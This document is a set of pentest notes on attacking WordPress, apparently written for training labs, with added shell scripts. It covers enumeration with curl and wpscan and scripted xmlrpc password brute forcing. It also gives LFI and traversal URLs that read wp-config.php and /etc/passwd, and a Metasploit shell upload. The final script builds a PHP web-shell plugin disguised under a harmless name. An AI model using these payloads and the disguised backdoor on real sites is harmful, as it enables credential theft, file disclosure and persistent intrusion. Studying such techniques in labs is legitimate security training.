WordPress
Enumeration (manual)
Browse to the robots.txt file to identify a WordPress site. On WordPress its content typically looks like this:
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/
Sitemap: https://inlanefreight.local/wp-sitemap.xml
Interesting files and folders:
wp-content/plugins
Plugins are stored here
wp-content/themes
Themes are stored in this directory
#Identify WordPress
curl -s http://blog.inlanefreight.local | grep WordPress
<meta name="generator" content="WordPress 5.8" />
# msf module to enumerate valid WordPress usernames (and brute force them)
use auxiliary/scanner/http/wordpress_login_enum
Identify Themes
curl -s http://blog.inlanefreight.local/ | grep themes
Identify Plugins
curl -s http://blog.inlanefreight.local/ | grep plugins
Identify the plugin version
Browse to the plugin directory identified (e.g.: http://blog.inlanefreight.local/wp-content/plugins/mail-masta/)
Look for readme.txt (or changelog.txt) there and extract the version number and any other helpful information from it
Enumerating users
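Added example (not part of the original notes): the manual checks above, scripted so they can be run offline against a saved copy of the front page, a saved /wp-json/wp/v2/users response and the headers of a /?author=1 request. The hostname blog.inlanefreight.local comes from the notes; the theme, plugin names, versions and user records in the sample inputs are constructed for the demo. The curl lines in comments show how to fetch the same data from a live target.

```shell
#!/bin/sh
# Added example, not the original page's code. Sample inputs are constructed.

# Constructed stand-in for: curl -s http://blog.inlanefreight.local/
SAMPLE_HTML='<html><head>
<meta name="generator" content="WordPress 5.8" />
<link rel="stylesheet" href="http://blog.inlanefreight.local/wp-content/themes/twentytwentyone/style.css?ver=1.4" />
<link rel="stylesheet" href="http://blog.inlanefreight.local/wp-content/plugins/mail-masta/css/mm.css?ver=1.0" />
<script src="http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2"></script>
<script src="http://blog.inlanefreight.local/wp-content/plugins/mail-masta/js/mm.js?ver=1.0"></script>
</head><body></body></html>'

# Constructed stand-in for: curl -s http://blog.inlanefreight.local/wp-json/wp/v2/users
SAMPLE_USERS_JSON='[{"id":1,"name":"admin","slug":"admin","link":"http://blog.inlanefreight.local/author/admin/"},{"id":2,"name":"John Smith","slug":"john","link":"http://blog.inlanefreight.local/author/john/"}]'

# Constructed stand-in for: curl -sI 'http://blog.inlanefreight.local/?author=1'
SAMPLE_AUTHOR_HEADERS='HTTP/1.1 301 Moved Permanently
Location: http://blog.inlanefreight.local/author/admin/'

# Core version from the generator meta tag (prints nothing if the tag was removed).
wp_version() {
    printf '%s\n' "$1" | grep -o 'content="WordPress [0-9.]*"' \
        | grep -oE '[0-9]+(\.[0-9]+)*' | head -n 1
}

# Theme or plugin slugs referenced by asset URLs; $2 is "themes" or "plugins".
wp_assets() {
    printf '%s\n' "$1" | grep -oE "wp-content/$2/[A-Za-z0-9_-]+" \
        | sed "s#wp-content/$2/##" | sort -u
}

# "slug version" per plugin from the ?ver= query string on its assets.
# This is only a hint (sites sometimes append the core version); confirm with readme.txt.
wp_plugin_versions() {
    printf '%s\n' "$1" | grep -oE 'wp-content/plugins/[A-Za-z0-9_-]+/[^"]*\?ver=[0-9.]+' \
        | sed -E 's#wp-content/plugins/([A-Za-z0-9_-]+)/.*\?ver=([0-9.]+)#\1 \2#' | sort -u
}

# Login names from the REST users endpoint: "slug" is the username to attack,
# "name" is only the display name.
wp_users() {
    printf '%s\n' "$1" | grep -oE '"slug":"[^"]+"' | sed 's/"slug":"//; s/"$//'
}

# Classic author-ID check: /?author=N redirects to /author/<slug>/ when user N exists.
# Prints the slug, or nothing when there is no Location header (ID unused or blocked).
wp_author_slug() {
    printf '%s\n' "$1" | grep -i '^Location:' | sed -E 's#.*/author/([^/]+)/?.*#\1#'
}

echo "version : $(wp_version "$SAMPLE_HTML")"
echo "themes  : $(wp_assets "$SAMPLE_HTML" themes | tr '\n' ' ')"
echo "plugins : $(wp_assets "$SAMPLE_HTML" plugins | tr '\n' ' ')"
wp_plugin_versions "$SAMPLE_HTML" | sed 's/^/plugin  : /'
echo "users   : $(wp_users "$SAMPLE_USERS_JSON" | tr '\n' ' ')"
echo "author1 : $(wp_author_slug "$SAMPLE_AUTHOR_HEADERS")"
```

Against a live target, replace the constants with the curl calls shown in the comments; the REST users endpoint and the author redirect are both commonly disabled by hardening plugins, so treat an empty result as "blocked", not "no users".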
WPSCAN
WPScan identifies the WordPress version, plugins, themes and known vulnerabilities automatically and much faster than doing it by hand:
Enumeration
Use WPSCAN with an API token to get the identified vulnerabilities. You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
#Enumerate everything
wpscan --url http://blog.inlanefreight.local/ --enumerate --api-token <SNIP>
_______________________________________________________________
        [WPScan ASCII-art banner]
        WordPress Security Scanner by the WPScan Team
        Version 3.8.28
        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://blog.inlanefreight.local/ [10.129.1.169]
[+] Started: Wed Oct 15 05:16:04 2025
Identify themes/plugins
# Use the API token for authenticated scanning of WordPress plugins.
wpscan --url http://172.25.210.128 --api-token <API Token Here>
# Enumerate plugins (p = popular plugins; vp = only known-vulnerable ones, ap = all known plugins, much slower)
wpscan --url http://www.cpent.com --enumerate p
# Enumerate themes (t = popular themes; vt / at work the same way)
wpscan --url http://www.cpent.com --enumerate t
Note down all interesting findings from the enumeration phase before starting the exploitation phase
Attacks
# Brute force the password of a known user through wp-login.php with a wordlist
wpscan --url http://172.25.210.128 -U psychotic_animal -P /usr/share/seclists/Passwords/xa
# If xmlrpc.php is enabled, attack it instead: each attempt is a single POST with no cookie/redirect handling, so it is faster than wp-login.php
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
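Added example (not part of the original notes, nor wpscan's code): what the xmlrpc password attack actually exchanges. Each attempt is a wp.getUsersBlogs call that WordPress authenticates with the supplied credentials; a wrong password comes back as a fault with code 403, a right one as the list of blogs. The block builds the request bodies, escapes XML-sensitive characters in passwords, and classifies constructed sample responses. The endpoint path /xmlrpc.php is the WordPress default, the username and passwords are made up for the demo, and the curl lines are left as comments. Caveat: the system.multicall variant only pays off against WordPress older than 4.4; newer versions stop checking credentials for the rest of a multicall after the first failed login, which is why the per-request method used above works everywhere xmlrpc.php is reachable.

```shell
#!/bin/sh
# Added example, not the original page's code. Credentials and responses are constructed.
TARGET="http://blog.inlanefreight.local/xmlrpc.php"   # default WordPress XML-RPC path (assumed enabled)

# Passwords from wordlists contain & < > which would break the XML body.
xml_escape() {
    printf '%s' "$1" | sed 's/&/\&amp;/g; s/</\&lt;/g; s/>/\&gt;/g'
}

# One login probe: wp.getUsersBlogs(username, password).
xmlrpc_probe_body() {
    printf '<?xml version="1.0"?>\n<methodCall>\n<methodName>wp.getUsersBlogs</methodName>\n<params>\n'
    printf '<param><value><string>%s</string></value></param>\n' "$(xml_escape "$1")"
    printf '<param><value><string>%s</string></value></param>\n' "$(xml_escape "$2")"
    printf '</params>\n</methodCall>\n'
}

# Many probes in one request via system.multicall; $2 = file with one password per line.
# One call per output line so they can be counted. Only effective on WordPress < 4.4.
xmlrpc_multicall_body() {
    printf '<?xml version="1.0"?>\n<methodCall>\n<methodName>system.multicall</methodName>\n'
    printf '<params><param><value><array><data>\n'
    while IFS= read -r pw || [ -n "$pw" ]; do
        printf '<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><string>%s</string></value><value><string>%s</string></value></data></array></value></member></struct></value>\n' \
            "$(xml_escape "$1")" "$(xml_escape "$pw")"
    done < "$2"
    printf '</data></array></value></param></params>\n</methodCall>\n'
}

# Constructed responses: a failed login is a <fault> (faultCode 403), a valid one lists blogs.
RESP_FAIL='<?xml version="1.0" encoding="UTF-8"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>403</int></value></member><member><name>faultString</name><value><string>Incorrect username or password.</string></value></member></struct></value></fault></methodResponse>'
RESP_OK='<?xml version="1.0" encoding="UTF-8"?><methodResponse><params><param><value><array><data><value><struct><member><name>isAdmin</name><value><boolean>1</boolean></value></member><member><name>url</name><value><string>http://blog.inlanefreight.local/</string></value></member></struct></value></data></array></value></param></params></methodResponse>'

# Returns 0 when the response proves the credentials were accepted, 1 otherwise.
xmlrpc_login_ok() {
    printf '%s\n' "$1" | grep -q '<fault>' && return 1
    printf '%s\n' "$1" | grep -q '<name>isAdmin</name>'
}

# Sending a probe to the target (not executed here):
#   xmlrpc_probe_body john 'Password1' | curl -s -X POST -H 'Content-Type: text/xml' --data-binary @- "$TARGET"
xmlrpc_probe_body john 'Pa<ss&word'
if xmlrpc_login_ok "$RESP_OK"; then echo "RESP_OK   -> valid credentials"; fi
if ! xmlrpc_login_ok "$RESP_FAIL"; then echo "RESP_FAIL -> rejected"; fi
```

A quick reachability check before running the attack is `curl -s -X POST "$TARGET" -d '<methodCall><methodName>system.listMethods</methodName></methodCall>'`; if that returns the method list, the xmlrpc attack mode is usable.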
# Directory traversal on a vulnerable wordpress plugin. This approach uses the 'ebook-download' plugin to access sensitive files.
http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
#Mail-Masta vulnerable plugin LFI example
blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Look for known vulnerabilities with searchsploit
searchsploit wordpress
Upload a malicious plugin if you have admin privileges on the WordPress application
#Msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
#Set options
set USERNAME xx
set PASSWORD xx
set RHOSTS 10.10.10.10
set VHOST blog.wordpresswebsite.local
exploit
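Added example (not part of the original notes, nor the Metasploit module's code): the manual version of what wp_admin_shell_upload does, for when you have admin credentials and want to upload through Plugins > Add New > Upload Plugin yourself. WordPress only accepts a file that starts with a "Plugin Name:" header comment, so the block generates that plus a minimal command-execution shell and packs it into a zip when zip is installed. The slug wp-health-check, the plugin name and the cmd parameter are chosen for the demo.

```shell
#!/bin/sh
# Added example, not the original page's code. Slug, name and parameter are assumptions.
PLUGIN_SLUG="wp-health-check"   # innocuous-looking directory/file name

# Plugin source: header comment WordPress requires, then a shell that runs ?cmd=...
plugin_source() {
    cat <<EOF
<?php
/*
Plugin Name: $1
Description: Site health helper
Version: 1.0
*/
// Web shell: executes the value of the cmd parameter and returns its output as text.
if (isset(\$_GET['cmd'])) {
    header('Content-Type: text/plain');
    echo shell_exec(\$_GET['cmd']);
}
EOF
}

# Write the plugin under $1 and print the path of the upload artefact
# (the zip, or the .php file when zip is not installed).
build_plugin_zip() {
    dir="$1/$PLUGIN_SLUG"
    mkdir -p "$dir"
    plugin_source "WP Health Check" > "$dir/$PLUGIN_SLUG.php"
    if command -v zip >/dev/null 2>&1; then
        (cd "$1" && zip -qr "$PLUGIN_SLUG.zip" "$PLUGIN_SLUG")
        printf '%s\n' "$1/$PLUGIN_SLUG.zip"
    else
        printf '%s\n' "$dir/$PLUGIN_SLUG.php"
    fi
}

OUT=$(mktemp -d)
echo "upload this: $(build_plugin_zip "$OUT")"
# After upload and activation the shell is reachable at (assumed layout):
#   http://blog.inlanefreight.local/wp-content/plugins/wp-health-check/wp-health-check.php?cmd=id
rm -rf "$OUT"
```

Delete the plugin (and the uploaded zip left in wp-content/uploads if the upload failed) when the engagement is over; a forgotten plugin like this is a backdoor for whoever finds it next.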